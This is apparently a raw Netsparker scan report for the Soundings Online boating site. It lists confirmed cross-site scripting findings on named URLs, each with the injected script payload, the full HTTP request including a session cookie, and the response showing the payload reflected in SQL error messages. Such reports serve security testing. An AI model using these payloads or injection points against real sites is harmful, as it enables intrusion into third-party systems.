Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:35:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00227E)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00227E)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/banners/click/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: <br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Dig..
- /component/banners/

/component/banners/ CONFIRMED

http://www.soundingsonline.com/component/banners/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002315)</script>

Request

GET /component/banners/?'"--></style></script><script>netsparker(0x002315)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/banners/click/22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:35:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:35:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002315)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002315)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/banners/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: <br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital P..
- /features

/features CONFIRMED

http://www.soundingsonline.com/features?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x002307..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002307)</script>

Request

GET /features?'"--></style></script><script>netsparker(0x002307)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:35:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:35:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002307)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002307)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Stories, Boating Destinations, Boat and People Profiles | Soundings Online</title> <link href="/features?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_lifestyle&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_profile&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" 